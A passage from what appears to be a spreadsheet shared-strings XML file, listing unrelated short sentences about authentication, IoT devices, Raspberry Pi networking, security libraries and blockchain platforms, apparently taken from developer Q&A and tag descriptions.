    <t>Now, if you need to store a password to another service and you can't help but use the plain password with their API, then you have few possible choices.</t>
  </si>
  <si>
    <t>These modules are designed in such a way, that you do not have to care much about establishing a reliable communication.</t>
  </si>
  <si>
    <t>If you don't, you are unable to understand protocols created by others, let alone creating your own protocol.</t>
  </si>
  <si>
    <t>How about creating a web-app in the tablet and use webiopi to communicate with the raspberry-pi
But yeah this might not be a secure way to do things</t>
  </si>
  <si>
    <t>This module can prolong communication to RPi or you can try to implement the Accessory stack (and communication with authentification chip) to RPi itself.</t>
  </si>
  <si>
    <t>An obvious solution would be to use
to get the password at the start of running, and store that in memory.</t>
  </si>
  <si>
    <t>Ultimately though we want to add OAuth support to Riot's public APIs.</t>
  </si>
  <si>
    <t>Just take into account that it may not work for all platforms (I have tested it in xtensa embedded architecture and CygWIN, but this is a hacking trick, so...).</t>
  </si>
  <si>
    <t>The confirmation is optional and is only done on Desktop and Mobile as part of the system-level user experience.</t>
  </si>
  <si>
    <t>However, there are some notes which need to be focused by using different protocol (such as , Socks, etc) configured in proxy server, as below.</t>
  </si>
  <si>
    <t>Practically, if you have a secure SSH setup and are running your HTTP server in a way that is secure, it is very unlikely that anyone could do anything.</t>
  </si>
  <si>
    <t>You can use cross-account credentials to access resources belonging to another AWS account in an IoT rule.</t>
  </si>
  <si>
    <t>Thus avoid sending AT commands and a communication can  be easily debugged.</t>
  </si>
  <si>
    <t>You can easily define a proxy to EventHubClient by setting the Service Bus environnement communication mode to HTTP.</t>
  </si>
  <si>
    <t>C2D messages are used to send raw data to devices, meaning you implement your own "protocol" between cloud and device.</t>
  </si>
  <si>
    <t>Unfortunately, HID is currently protected as a reserved service, which prevents it from being implemented by a 3rd party application.</t>
  </si>
  <si>
    <t>Open the Google Cloud Console using your account and find where your account credentials are defined.</t>
  </si>
  <si>
    <t>A great and simple tool to easily SSH to your Raspberry Pi, no matter which WiFi internet connection it is connected to, is SocketXP.</t>
  </si>
  <si>
    <t>Java Library for authentication, getting profile, contacts and updating status on Google, Yahoo, Facebook, Twitter, LinkedIn, and many more providers</t>
  </si>
  <si>
    <t>cryptlib is a security toolkit library that allows programmers to incorporate encryption and authentication services to software.</t>
  </si>
  <si>
    <t>It prevents applications from accessing shared system resources and eliminates the potential for application interference.</t>
  </si>
  <si>
    <t>JACC (Java Authorization Contract for Containers) is a spec that allows plugging in providers to handle the security decisions for a j2ee application server.</t>
  </si>
  <si>
    <t>truststore contains certificates from other parties that you expect to communicate with, or from Certificate Authorities that you trust to identify other parties.</t>
  </si>
  <si>
    <t>When combined with an on-premise web server and SQL Azure, SecurEntity offers you a killer combination:</t>
  </si>
  <si>
    <t>Starting with iOS 8, third-party developers are able to access Touch ID and determine whether or not a fingerprint scan was valid.</t>
  </si>
  <si>
    <t>KNX is a standardized, OSI-based network communications protocol for intelligent buildings.</t>
  </si>
  <si>
    <t>The Stanford Javascript Crypto Library is a project by the Stanford Computer Security Lab to build a secure, powerful, fast, small, easy-to-use, cross-browser library for cryptography in Javascript.</t>
  </si>
  <si>
    <t>[DEPRECATED] The oauth2client python library made it easy to connect to resources protected by OAuth2.0.</t>
  </si>
  <si>
    <t>Apktool is a tool for reverse engineering 3rd party, closed, binary Android apps.</t>
  </si>
  <si>
    <t>ALFA, the Axiomatics Language For Authorization, is an pseudo-code used to write fine-grained authorization policies which are then converted into XACML 3.0.</t>
  </si>
  <si>
    <t>The iOS App Group Container is a protected folder for sharing content with trusted apps.</t>
  </si>
  <si>
    <t>Helmet is a javascript library that helps you secure your Express apps by setting various HTTP headers.</t>
  </si>
  <si>
    <t>App Transport Security is a feature that improves the security of connections between an app and web services.</t>
  </si>
  <si>
    <t>Painless is a simple, secure scripting language available in Elasticsearch by default from version 5 onwards.</t>
  </si>
  <si>
    <t>It regulates access to resources like system functions, other websites and applications and prevents unauthorised resources being used during an exam.</t>
  </si>
  <si>
    <t>The resource represented by a blank node is also called an anonymous resource.</t>
  </si>
  <si>
    <t>If you list a dangerous permission, the user has to explicitly give approval to your app.</t>
  </si>
  <si>
    <t>The waves platform is an open-source blockchain platform for decentralized web applications.</t>
  </si>
  <si>
    <t>Traefik-ingress refers to instances when the cloud native edge router Traefik is used as an Ingress controller for a Kubernetes cluster.</t>
  </si>
  <si>
    <t>It allows you to write programs that invoke and interact with processes on remote servers, via SSH2.</t>
  </si>
  <si>
    <t>RubyCAS-Server is an implementation of the server-end of JA-SIG's CAS protocol, providing a cross-domain single sign-on solution for web applications.</t>
  </si>
  <si>
    <t>It is a technique mostly used to encode optional information within data communication protocols.</t>
  </si>
  <si>
    <t>A protection ring is one of two or more hierarchical levels or layers of privilege within the architecture of a computer system.</t>
  </si>
  <si>
    <t>Its security functionality mainly deals with authentication, authorization and secure over-the-wire transmission of user credentials.</t>
  </si>
  <si>
    <t>It is also configurable so that you can specify and use any OAuth 2.0 endpoints as long as they implement OAuth 2.0 draft 10 and above.</t>
  </si>
  <si>
    <t>When you request a file to import into your application, Filepicker.io guides the user through selecting a file, authenticating any necessary third-party services.</t>
  </si>
  <si>
    <t>Fortify provides software products and services for application security in development, and for websites and mobile applications.</t>
  </si>
  <si>
    <t>You can turn on tracking by providing a String resource of the name ga_api_key with a value of your account id (form UA-12345-6).</t>
  </si>
  <si>
    <t>There are various software and hardware solutions that help to protect services from such attacks.</t>
  </si>
  <si>
    <t>ANSI ASC X9.95 standard also requires the third party to prove that a reliable time source was used.</t>
  </si>
  <si>
    <t>FoundationDB's core is a simple key-value API with useful properties and strong guarantees.</t>
  </si>
  <si>
    <t>NetFlow 9 is the basis of the IPFIX standard, and has been adapted as the basis for formats such as NSEL (NetFlow Security Event Logging).</t>
  </si>
  <si>
    <t>So it works through firewalls and on shared hosting accounts, and gives less security worries.</t>
  </si>
  <si>
    <t>URL authorization
URL authorization is performed by the
UrlAuthorizationModule, which maps users and roles to URLs in ASP.NET
applications.</t>
  </si>
  <si>
    <t>The library makes it easy to authenticate with Instagram and your developer account.</t>
  </si>
  <si>
    <t>WS-Federation is an Identity Federation specification, which provides mechanisms for allowing differential security realms to arrange information on identities, identity attributes and authentication.</t>
  </si>
  <si>
    <t>Some other helpful sub features to easily manage cookies, session, ...</t>
  </si>
  <si>
    <t>This information is useful for developers who want to throttle their apps' data access down or off for device users who are sensitive to data access charges.</t>
  </si>
  <si>
    <t>It supports hundreds of providers for both OAuth1.0 and OAuth2, and it is configured via straightforward JSON data structure.</t>
  </si>
  <si>
    <t>It provides a full services User Interface (UI) and well as an SDK (url: https://www.npmjs.com/package/bluemix-secure-gateway).</t>
  </si>
  <si>
    <t>It is used in many Internet protocols that use cryptography, including ssl/tls-based protocols (https, etc.</t>
  </si>
  <si>
    <t>API combines the power of SoapUI NG Pro, LoadUI NG Pro, Secure, ServiceV, and API Monitoring in AlertSite into a single pane of glass.</t>
  </si>
  <si>
    <t>You can configure ASP.NET Core Identity to use a SQL Server database to store user names, passwords, and profile data.</t>
  </si>
  <si>
    <t>Resources
Getting Started
Github HashiCorp Vault
Amazon Web Services Quick Start for Vault
Vault for Data Protection</t>
  </si>
  <si>
    <t>ktpass must be run on either a member server or a domain controller of the Active Directory domain.</t>
  </si>
  <si>
    <t>When asking questions about App ID, you should:
Ensure you are asking a technical question about the App ID service.</t>
  </si>
  <si>
    <t>Requires the consumer and access tokens and secrets of a Twitter developer account to access.</t>
  </si>
  <si>
    <t>MetaMask requires no login and does not store your private keys in any server, instead they are stored on Chrome and password protected.</t>
  </si>
  <si>
    <t>It supports a large number of external authentication providers, such as Facebook, Google, and Twitter.</t>
  </si>
  <si>
    <t>Another common usage of this acronym is for denial-of-service attacks.</t>
  </si>
  <si>
    <t>Provide customers with an easy check-out through their own personal account and tailor messages to their needs.</t>
  </si>
  <si>
    <t>Our team is dedicated to continuing to improve the anomaly detection service to provide precise results.</t>
  </si>
  <si>
    <t>An app that has a sandboxed view always has access to the files that
  it creates, both inside and outside its app-specific directory.</t>
  </si>
  <si>
    <t>Wireless technologies allow the transfer of data between two points that have no physical connection.</t>
  </si>
  <si>
    <t>The main goal of JAAS is to separate the concerns of user authentication so that they may be managed independently.</t>
  </si>
  <si>
    <t>The authentication library can reduce the amount of code needed to handle OAuth 2.0, and sometimes a few lines is all you need.</t>
  </si>
  <si>
    <t>A modest number of iterations, say 1000, is not likely to be a burden for
  legitimate parties when computing a key, but will be a significant burden for opponents.</t>
  </si>
  <si>
    <t>In various access-control systems, roles define a group of users and organize permissions into a more manageable structure.</t>
  </si>
  <si>
    <t>Automatically discovers, monitors, and manages software and network resources.</t>
  </si>
  <si>
    <t>Java as a language is not appropriate for low-level network configuration, but it is very useful for service registration and discovery.</t>
  </si>
  <si>
    <t>MAC addresses are used for numerous network technologies and most IEEE 802 network technologies, including Ethernet.</t>
  </si>
  <si>
    <t>[IoT-Core] ERROR - {org.wso2.carbon.identity.oauth2.grant.jwt.JWTBearerGrantHandler} Signature or Message Authentication invalid.</t>
  </si>
  <si>
    <t>My use case is that RPI #1 has internet connectivity, but RPI #2 does not, and I want to fully control and access RPI #2 via RPI #1 over Xbee.</t>
  </si>
  <si>
    <t>Even if you could include the code it relies on a browser OAuth flow which would not work in this type of application.</t>
  </si>
  <si>
    <t>The RoleARN could allow iot:*, then when you assume role, you can narrow the permissions down to, for instance iot:Connect and for specific resources.</t>
  </si>
  <si>
    <t>It is not easy to provide you an out-of-the-box solution since we don't have any code to refer to but there are several ways to add security to a communication mechanism.</t>
  </si>
  <si>
    <t>You can use the Regsvr32 tool (Regsvr32.exe) to register and unregister OLE controls such as DLL or ActiveX Controls (OCX) files in the Windows Registry.</t>
  </si>
  <si>
    <t>Application model for presenting an identity to a claims aware application.</t>
  </si>
  <si>
    <t>Authentication and authorization within security level of different access levels associated with enterprise applications.</t>
  </si>
  <si>
    <t>Enterprise - authenticate users with Active Directory, LDAP and SAML, among others.</t>
  </si>
  <si>
    <t>Perfecto helps you validate your work fast on real platforms before check-in.</t>
  </si>
  <si>
    <t>Each TPM contains a unique key and can therefore be used to authenticate the platform and to encrypt data that will not be decryptable without that particular TPM.</t>
  </si>
  <si>
    <t>No direct access to the host operating system APIs are allowed; all accesses are mediated and access controlled.</t>
  </si>
  <si>
    <t>More info at: How AWS IoT Core is Helping Customers Navigate the Upcoming Distrust of Symantec Certificate Authorities</t>
  </si>
  <si>
    <t>Usercake's goal is to provide a secure user management system which can easily be adapted to any project's needs.</t>
  </si>
  <si>
    <t>django-socialauth is a social authentication/authorization mechanism for Django projects.</t>
  </si>
  <si>
    <t>How can smartly/remotely control a Raspberry-PI system through android apps.</t>
  </si>
  <si>
    <t>What is password for Windows 10 IOT Core Dashboard if i installed the Windows 10 IOT Core ( 10.0.16299.15) through the NOOBS?</t>
  </si>
  <si>
    <t>I'm running a lightning node (a 2nd layer for bitcoin transactions) on a Raspberry Pi.</t>
  </si>
  <si>
    <t>This is in contrast to the default security mechanism of Discretionary Access Control (DAC) where enforcement is left to the discretion of users.</t>
  </si>
  <si>
    <t>The Aim:
Heedlessly ssh into a Raspberry Pi 3B on my Win7 platform(s).</t>
  </si>
  <si>
    <t>https://localhost:9443/devicemgt/uuf/login?referer=/ 
--------------------- Update -------------------- 
FYI: carbon works like a charm 
https://localhost:9443/carbon/admin/login.jsp</t>
  </si>
  <si>
    <t>Identity usually consists of a single piece of information, either a mac address or serial number
Some method of updating device code to use the Azure Device Provisioning Service to provision these devices
Can I get a clear definition (tech sheet) on what constitutes a legacy device?</t>
  </si>
  <si>
    <t>When the hidden layers are larger than the input layer, an autoencoder can potentially learn the identity function and become useless; however, experimental results have shown that such autoencoders might still serve learn useful features in this case.</t>
  </si>
  <si>
    <t>The snap format is a single compressed filesystem (usually created with snapcraft tool) that is mounted dynamically by the host operating system, together with declarative metadata that is interpreted by the snap system to set up an appropriately shaped secure sandbox or container for that application.</t>
  </si>
  <si>
    <t>It consists of a singleton class that handles all the events, and offers additional ways to control dispatching and verification of event parameters, such as  and removeAll() methods, and the ability to change attributes at runtime.</t>
  </si>
  <si>
    <t>Yes, unfortunately UWP apps are not supported yet by Storage, as there's a bug in the UWP platform that causes problems with Auth.</t>
  </si>
  <si>
    <t>Registered Apple developers could invite 25 internal testers using an iTunes Connect account using just an email address.</t>
  </si>
  <si>
    <t>I'm trying to develop a simple app to open and close an electric door lock.</t>
  </si>
  <si>
    <t>Previously in Mobile Services it was possible to send POST like this:
But now authentication was absolutely changed.</t>
  </si>
  <si>
    <t>Now I want to add Jasper for voice recognition, they offer an image as well, which pretends to be the easiest way to install jasper.</t>
  </si>
  <si>
    <t>I looked up (by simple googling and reading the official documentation) how I can secure the connections.</t>
  </si>
  <si>
    <t>I want to automate the mounting process, but don't want to share the keys on a USB-Media for security reasons.</t>
  </si>
  <si>
    <t>If not than what should be the solution or further process to use such auto generated certs&amp;keys for secure mqtt connection with AWS IOT..?</t>
  </si>
  <si>
    <t>Once they do that, then your app must follow the rest of the usual server-side flow (code for token exchange, etc.</t>
  </si>
  <si>
    <t>Since SQLite relies on file locking, shared filesystems like NFS may have issues - see their FAQ for details.</t>
  </si>
  <si>
    <t>In the case of your Leonardo, it does not appear to be generally class-compliant, but more specifically HID compliant.</t>
  </si>
  <si>
    <t>You want a private one-to-one stream to go over the internet, but streaming services are generally used to provide bandwidth for one-to-many applications.</t>
  </si>
  <si>
    <t>I had to go to my Google account (in a browser) and select an option to "enable access for less secure apps"
https://www.google.com/settings/security
Changing that allowed my script to work again.</t>
  </si>
  <si>
    <t>It is customary to have a checksum in order to verify the correctness of the data although serial communication is relatively reliable.</t>
  </si>
  <si>
    <t>Do note that that is not going to be thread safe, nor is that variable going to be shared across processes if you use a WSGI server that uses multiprocessing to scale.</t>
  </si>
  <si>
    <t>(Not 100% sure what are you asking, but assuming the simplest case...)
Setup IP networking on the ethernet interfaces of both devices.</t>
  </si>
  <si>
    <t>If you manage to setup the RPi-sender as an access point and manage to connect the RPi-receiver to that network, you are well on your way.</t>
  </si>
  <si>
    <t>Update: 
For deleting a existing device identity, please see the REST API reference and see the code below.</t>
  </si>
  <si>
    <t>It's a protocol designed for the small payloads of an 802.15.4 network, and you could potentially based your protocol off of a subset of it.</t>
  </si>
  <si>
    <t>As the subject mix raspberry / hardware / linux / web, you read many crap solutions on internet; they often deliver root permission everywhere!</t>
  </si>
  <si>
    <t>If there is anyone who is fully aware of creating bluetooth connecting between Raspberry Pi 3 built-in BLE with Arduino Ble, Please share your knowledge.</t>
  </si>
  <si>
    <t>It is mentioned in the documentation that the resource will be locked once you have an active instance of Camera.</t>
  </si>
  <si>
    <t>The above example will work for the most part for invoking PubSub APIs, except for the part where you will initialize the credentials object.</t>
  </si>
  <si>
    <t>These temporary anonymous accounts can be used to allow users who haven't yet signed up to your app to work with data protected by security rules.</t>
  </si>
  <si>
    <t>You also need to implement the protocol activation in app B:
The initialization you need to perform in  will probably be similar to OnLaunched in case the app is not yet launched.</t>
  </si>
  <si>
    <t>Please try to modify the name of the application Identity in the file Package.appxmanifest(open it with View Code) as a new Guid or other different value, and then deploy it again.</t>
  </si>
  <si>
    <t>If you need to call a hidden API, you need to import a jar with full APIs, the jar in SDK is a incompleted one which all hidden APIs are disappeared.</t>
  </si>
  <si>
    <t>It was unclear that the registrationid was the registarationid of the leaf and not the registrationid of the parent certificate
"Replace registration id with the Registration Id noted in the previous section. "</t>
  </si>
  <si>
    <t>Specifically the name is 
**4-channel I2C-safe Bi-directional Logic Level Converter - BSS138 $4.00 **
You can wire the communication between the two devices using this simple device.</t>
  </si>
  <si>
    <t>Once it's not isolated anymore, a means of synchronizing access to shared data is necessary, and some data must be shared - that's the definition of there being no isolation.</t>
  </si>
  <si>
    <t>Serial communication is not some strange animal from history channel - take it as a data layer.</t>
  </si>
  <si>
    <t>Using an ssh tunnel is, once you get used to it, a simple and straightforward way to access services across any untrusted network, by it your own, a public wifi, or the internet at large.</t>
  </si>
  <si>
    <t>This is going to require a separate authentication path as well, likely a service account key that you add to your GCP project, then download to your device.</t>
  </si>
  <si>
    <t>regarding the authorization context you can have a look at the authorization section in our connections documentation.</t>
  </si>
  <si>
    <t>It is commonly used to generate public key fingerprints for SSH(secure shell) and other protocols.</t>
  </si>
  <si>
    <t>google-api-nodejs-client is Google's officially supported node.js client library for accessing Google APIs, it also supports authorization and authentication with OAuth 2.0.</t>
  </si>
  <si>
    <t>Credential Manager allows you to store credentials, such as user names and passwords that you use to log on to websites or other computers on a network.</t>
  </si>
  <si>
    <t>Use this tag to better reference questions about WindowsIdentity allowing to encapsulate information about Windows accounts.</t>
  </si>
  <si>
    <t>This macOS/iOS Info.plist key specifies exceptions to the default strong Internet security in iOS and OS X apps and in app extensions.</t>
  </si>
  <si>
    <t>These pre-shared keys are symmetric keys shared in advance among the communicating parties.</t>
  </si>
  <si>
    <t>While the tag focuses on custom-made or proprietary scan codes (such as Snapchat Snapcode/Snaptag and Facebook Messenger's circular codes), it may also be used for standardized codes (such as QR and bar-codes).</t>
  </si>
  <si>
    <t>Creation and transfer of coins is based on an open source cryptographic protocol and is not managed by any central authority.</t>
  </si>
  <si>
    <t>OmiseGO is an initiative that's working towards creating a fully public, currency agnostic decentralized exchange (DEX) network secured by Ethereum.</t>
  </si>
  <si>
    <t>Questions related to the usage of the Neblio REST APIs or Neblio API Suite for building distributed applications on the Neblio Blockchain Platform.</t>
  </si>
  <si>
    <t>Twitter Login is the sign in process with Twitter credentials in different websites and web services.</t>
  </si>
  <si>
    <t>These can be public facing web applications, or backend applications, including micro services or databases.</t>
  </si>
  <si>
    <t>As a part of Google's Android SDK, the AccountManager can be used create a separation of the cloud account information entered by the user and the applications that make use of it.</t>
  </si>
  <si>
    <t>Managing the private keys and personal certificates centrally and then deploying them creates an additional security risk.</t>
  </si>
  <si>
    <t>Probably the most common use of passwords is to limit access to user account information to the owner of the account.</t>
  </si>
  <si>
    <t>This structure is filled in with the address of the peer socket, as known to the communications layer.</t>
  </si>
  <si>
    <t>For reliable operation the application should detect the network errors defined for the protocol after accept() and treat them like EAGAIN by retrying.</t>
  </si>
  <si>
    <t>Servers often provide essential services across a network, either to private users inside a large organization or to public users via the Internet.</t>
  </si>
  <si>
    <t>ASP.NET 3.5 and 4.0 shared hosting servers use the default Medium trust level with the addition of OleDbPermission, OdbcPermission, and a less-restrictive WebPermission.</t>
  </si>
  <si>
    <t>Touch 2+ has improved MVC capabilities, with better inheritance, obfuscated code (during production), better native conversion and more.</t>
  </si>
  <si>
    <t>A TrustZone CPU can switch states between two worlds referred to as 'secure' and 'normal'.</t>
  </si>
  <si>
    <t>Yodlee's platform provides a secure way of accessing end user authorized financial data and normalizing this data across disparate data feeds and screenscraped sources.</t>
  </si>
  <si>
    <t>A personal web server is an appliance that allows users to store and access private files remotely from any device connected to the web.</t>
  </si>
  <si>
    <t>A blockchain is typically managed by a peer-to-peer network collectively adhering to a protocol for validating new blocks.</t>
  </si>
  <si>
    <t>In this model of trust relationships, a CA is a trusted third party that is trusted by both the subject (owner) of the certificate and the party relying upon the certificate.</t>
  </si>
  <si>
    <t>Apart from verifying the mobile number CAL will also perform multitasking to assist the developers to derive an exhaustive scrutiny of their application.</t>
  </si>
  <si>
    <t>Ethereum also provides a cryptocurrency token called ether, which can be transferred between accounts and used to compensate participant nodes for computations performed.</t>
  </si>
  <si>
    <t>The drivers include implementation of CSP (Cryptographic Service Provider) for CryptoAPI.</t>
  </si>
  <si>
    <t>Trusted Stores are also featured in Google Shopping listings, with the GTS badge being displayed for listings belonging to Trusted Stores.</t>
  </si>
  <si>
    <t>Getting Started with Mobile Analytics
App ID:
Use the IBM Bluemix App ID service to add authentication to your mobile and web apps and protect your back-end systems.</t>
  </si>
  <si>
    <t>To assign permissions to a user, group, role, or resource, you create a policy, which is a document that explicitly lists permissions.</t>
  </si>
  <si>
    <t>In computer security, general access control includes identification,, authentication, authorization, access approval, and audit.</t>
  </si>
  <si>
    <t>Note: Anyone with access to this file can impersonate you on Twitter, so
it's important to keep it secure, just as you would treat your SSH private key.</t>
  </si>
  <si>
    <t>Bulletproof is a single-class library to securely upload images in PHP.</t>
  </si>
  <si>
    <t>DDoS Protection provides customers with the peace of mind that their services are protected from the impacts of DDoS attacks.</t>
  </si>
  <si>
    <t>Simple Object Access Protocol (SOAP) 1.1
SOAP is a lightweight protocol for
  exchange of information in a
  decentralized, distributed
  environment.</t>
  </si>
  <si>
    <t>The dashboard allows simple actions to be performed from the UI, such as silencing or deleting checks and clients.</t>
  </si>
  <si>
    <t>There are three main goals of Vyper:
Security - it should be possible and natural to build secure smart
contracts in Vyper.</t>
  </si>
  <si>
    <t>Twitter Login is the sign in (authentication) process with Twitter credentials in different websites and web services.</t>
  </si>
  <si>
    <t>Target:
Low-power solutions for secure, wearable, and portable IoT applications.</t>
  </si>
  <si>
    <t>While logged in, users can connect with friends via these media and post information and updates to their Facebook profile.</t>
  </si>
  <si>
    <t>The Common Access Card (CAC) is the standard identification for active-duty military personnel, Selected Reserve, DoD civilian employees, and eligible contractor personnel.</t>
  </si>
  <si>
    <t>Which of then is the best practices, but also both of them are secure regarding the Cognito user only is able to interact with his own devices?</t>
  </si>
  <si>
    <t>If it does, then you have to look at the potential hardware causes....
You have to keep in mind that serial is NOT a reliable protocol.</t>
  </si>
  <si>
    <t>If you want to connect insecurely (and we don't recommend) you can change the settings from IoT Platform dashboard, Security &gt; Connection security.</t>
  </si>
  <si>
    <t>For that you should use one of the AWS IoT SDKs like Python (Boto) along with correct authentication and authorization, more information about python SDK for Greengrass can be found here.</t>
  </si>
  <si>
    <t>In Windows Azure Active Directory Access Control (also known as Access Control Service or ACS), a service identity is a credential that is registered with an Access Control namespace and is intended for use by autonomous applications or clients.</t>
  </si>
  <si>
    <t>A form of firewall which controls input, output, and/or access from, to, or by an application or service.</t>
  </si>
  <si>
    <t>It allows developers to detect bugs and vulnerabilities as well as to decrease code smells, in more than 20 different languages.</t>
  </si>
  <si>
    <t>The Kohana Auth module provides an easy-to-use API for basic website authentication (users) and authorization (roles)</t>
  </si>
  <si>
    <t>and the data access layer that encapsulates the persistence mechanisms and exposes the data.</t>
  </si>
  <si>
    <t>Having a single location simplifies permission rules for Team Drive files.</t>
  </si>
  <si>
    <t>This improves security, decreases the startup time, and increases hardware utilization.</t>
  </si>
  <si>
    <t>It also provides a baseline environment to get started with a multi-account architecture, identity and access management, governance, data security, network design, and logging.</t>
  </si>
  <si>
    <t>But do we have any another way where any IP capable device can send heartbeat to IBM Watson Platform through any IBM services or database for device tracking?</t>
  </si>
  <si>
    <t>I am trying to build a wireless control of an LED Stripe.</t>
  </si>
  <si>
    <t>You might want to take a look at the Remote Monitoring preconfigured solution as a proof of concept.</t>
  </si>
  <si>
    <t>Managing that complexity vs managing credentials is the trade-off.</t>
  </si>
  <si>
    <t>Pidgin is a chat program which lets you log in to accounts on multiple chat networks simultaneously.</t>
  </si>
  <si>
    <t>Simple, modern, thread-safe key-value observing for iOS and OS X.</t>
  </si>
  <si>
    <t>The types of control codes you can specify depend on the device being accessed and the platform on which your application is running.</t>
  </si>
  <si>
    <t>Easily implement apps that use Bitcoin's contracts features.</t>
  </si>
  <si>
    <t>To use this sproc, one must first configure a Database Mail account and profile.</t>
  </si>
  <si>
    <t>Providing isolation is the main goal of concurrency control.</t>
  </si>
  <si>
    <t>You can obtain this key from the IoT Hub device identity registry - for example by using the DeviceExplorer tool.</t>
  </si>
  <si>
    <t>Amazon Cognito is an Amazon Web Services (AWS) product that controls authentication and access for mobile applications on internet-connected devices.</t>
  </si>
  <si>
    <t>This helps various systems manage Access Control without frequently asking for new Authentication information.</t>
  </si>
  <si>
    <t>With 25+ connectors available today, its easy to securely connect to the data you need.</t>
  </si>
  <si>
    <t>You can, however, have as many simultaneously connected devices as you have in your device identity registry.</t>
  </si>
  <si>
    <t>Key Components
Gateway for partner management, security.</t>
  </si>
  <si>
    <t>My questions are as follows:
In scenario 1: Let's say I need to connect only one thing to the Bluemix platform, so I configure the device type, device, authentication token, etc., to connect the device to the platform.</t>
  </si>
  <si>
    <t>(See how Internet and External Storage permissions are handled for an example of doing this in a way any app can utilize, or how the radio device is handled for a restricted example)   You then use normal linux serial APIs to access the port from your NDK code, or Java serial APIs to do so from Java code.</t>
  </si>
  <si>
    <t>While adding the unique certificate does not prevent tampering with the client id, it does give you the ability to block that single device from connecting.</t>
  </si>
  <si>
    <t>I really don't want to go CUPs route as that would need change in quite a few apps which expect WIoTP credentials to be present in iotf-service object.</t>
  </si>
  <si>
    <t>Use a technology such as Bluetooth beacons and an app to determine rough location and send that to your IoT device.</t>
  </si>
  <si>
    <t>I did find a way, involving a companion phone app to inject tokens into the things app.</t>
  </si>
  <si>
    <t>As long as the compiler can manage the semaphore in a single instruction it will be safe from corruption.</t>
  </si>
  <si>
    <t>Flask-Security is a Flask extension which adds basic security and authentication features to your Flask apps quickly and easily.</t>
  </si>
  <si>
    <t>DNS-based Authentication of Named Entities (DANE) is a protocol to allow X.509 certificates, commonly used for Transport Layer Security (TLS), to be bound to DNS names using Domain Name System Security Extensions (DNSSEC).</t>
  </si>
  <si>
    <t>Satellizer is a simple to use, end-to-end, token-based authentication module for AngularJS with built-in support for Google, Facebook, LinkedIn, Twitter authentication providers.</t>
  </si>
  <si>
    <t>Certificate, Key, and Trust Services provides a C API for managing certificates, public and private keys, and trust policies.</t>
  </si>
  <si>
    <t>Separating the keystore and trust store files allows for the trust store to be distributed as part of an application's configuration package.</t>
  </si>
  <si>
    <t>In case of confidential information, passwords will be required even for read-only access, with different users having access to different subsets of information.</t>
  </si>
  <si>
    <t>The advantages of this project type are fully realized if you need to author your installation in an open format.</t>
  </si>
  <si>
    <t>The  is exposed by Exchange Web Services and allows searching of items using the EWS Managed API</t>
  </si>
  <si>
    <t>Salesforce Mobile SDK links into Force.com to provide tools to aid in the creation of standalone mobile apps that access and manipulate Salesforce data.</t>
  </si>
  <si>
    <t>User Registration
With the User Registration Add-On you can create forms that can be used to register users on your WordPress site.</t>
  </si>
  <si>
    <t>The GNOME Display Manager (GDM) is a program that manages graphical display servers and handles graphical user logins.</t>
  </si>
  <si>
    <t>According to IBM Knowledge Center,
The SSLContext is an engine class for an implementation of a secure
  socket protocol.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a class, introduced in Swift 4, for decoding JSON on Apple operating systems that conform to Decodable protocol (or Codable protocol, which is type alias for Encodable &amp; Codable).</t>
  </si>
  <si>
    <t>The OMG Network will be able to interact with Bitcoin (or Bitcoin-like blockchains) and other blockchain platforms through clearinghouses in state channels or smart contracts, as well as with digital fiat platforms and economies through collateralized fiat tokens.</t>
  </si>
  <si>
    <t>They
  also offer handling of late-bound data types and the ability to enforce security guarantees.</t>
  </si>
  <si>
    <t>A shared library is provided for parsing, generating, manipulating, and validating XML documents using the DOM, SAX, and SAX2 APIs.</t>
  </si>
  <si>
    <t>Some of the escaped codes are easily recognized and the hex or decimal equivalents easily remembered  but others are more obscure.</t>
  </si>
  <si>
    <t>I want to be able to respond to the Cloud-to-Device website generated message with data from my private network device, not just a delivery acknowledgement.</t>
  </si>
  <si>
    <t>Otherwise, I would need to set up a form on the Arduinos where users would have to input their login credentials for the app to associate devices to users, but from a user experience perspective that would be a pain.</t>
  </si>
  <si>
    <t>Android's security model prevents apps from accessing raw device resources like the  node of an attached USB device.</t>
  </si>
  <si>
    <t>LocalDB runs as a background process for each user that starts their own private instance rather than as a service that is shared by all users and would have its own security context.</t>
  </si>
  <si>
    <t>The basic idea of the unhosted movement is to not hand over your own data to a central data store of an application owner and potentially loose control.</t>
  </si>
  <si>
    <t>Because users are enrolled for this method automatically after device registration, you do not need to perform any additional steps to deploy or distribute the RSA SecurID Access Authenticator Tokencode.</t>
  </si>
  <si>
    <t>The first type of authentication is accepting proof of identity given by a credible person who has evidence on the said identity, or on the originator and the object under assessment as the originator's artifact respectively.</t>
  </si>
  <si>
    <t>Instead, the subscriber
  is identified by transmission of an IMSI number, which is stored on a
  SIM card that can (in theory) be transferred to any handset.</t>
  </si>
  <si>
    <t>My most recent addition was a simple login screen that stores an authentication in a session.</t>
  </si>
  <si>
    <t>When I check the console where Jenkins is running, Jenkins is idle and waiting for me to type in "git@localhost's password".</t>
  </si>
  <si>
    <t>background: on each order from a customer a invoice is created for device manufacturing with an unique serial number which identifies the device.</t>
  </si>
  <si>
    <t>This behavior happens across multiple devices, running the same version of the OS and Python 3.5.3 (latest fully patched).</t>
  </si>
  <si>
    <t>If flow control is needed, you will just have to add another simple polling method before you go into active receive so that the device knows it is "allowed" to communicate.</t>
  </si>
  <si>
    <t>Find Jenkins user by this command:
Then set  permissions to the Jenkins user to the files and folders as follows:</t>
  </si>
  <si>
    <t>It has support for LDAPv3, DSMLv2, multi-master replication, access controls, password policies, security and all features you can expect from a modern directory server.</t>
  </si>
  <si>
    <t>Tunneling is a technique that enables remote access users to connect to a variety of network resources through a public data network.</t>
  </si>
  <si>
    <t>If not secured properly, it can allow an attacker to set parameters that should not be controlled from the client.</t>
  </si>
  <si>
    <t>The company also provides a content filtering service called Internet Guide.</t>
  </si>
  <si>
    <t>authenticated role, 
If the role name is not explicitly defined in web.xml, it is used to denote the role name of all authenticated users.</t>
  </si>
  <si>
    <t>It extends the idea of C header files, which are stored in  files with private headers that are stored in *.r files.</t>
  </si>
  <si>
    <t>Developers can use Composer tools to create applications which exploit these APIs, and create loopback connectors which provide connectivity between the blockchain and their existing systems.</t>
  </si>
  <si>
    <t>Spring Cloud Sleuth implements a distributed tracing solution for Spring Cloud, borrowing heavily from Dapper, Zipkin and HTrace.</t>
  </si>
  <si>
    <t>Google's beacon platform enables contextual experiences for your users through interactions with Bluetooth low energy (BLE) beacons.</t>
  </si>
  <si>
